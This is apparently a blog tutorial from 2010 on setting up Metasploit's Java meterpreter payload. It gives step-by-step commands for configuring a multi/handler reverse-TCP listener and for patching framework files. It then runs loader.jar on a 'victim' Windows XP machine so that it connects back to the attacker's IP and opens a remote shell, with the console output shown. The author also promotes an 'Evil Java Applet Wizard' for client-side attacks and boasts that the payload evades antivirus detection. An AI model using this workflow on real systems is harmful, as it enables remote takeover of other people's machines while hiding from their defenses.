Metasploit JAVA meterpreter payload
If you haven’t noticed the Metasploit Framework has a JAVA meterpreter payload for some time now
It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.
It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Further more, I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.
The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.
Registered members can download the script at the end of this post (Script updated Aug 17) .
Why using a java meterpreter you ask ?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual tweaking is no longer necessary the Metasploit framework now has the java meterpreter listener built in.
That means you can skip steps 1 to 4
and instead of using the patched php meterpreter you can use the java meterpreter directly.
I have also updated the script to use the java payload as well.
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >Lets see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter4. Backup PHP Meterpreter files and Change jar files extensions to php (This will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)
msf > use exploit/multi/handler
smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows
C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 44447. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010
meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >P.S:
The java meterpreter will work for linux systems as well….
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010
meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).
2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.
If it worked it means that the victim has Java installed on his system which allowes us to use this payload.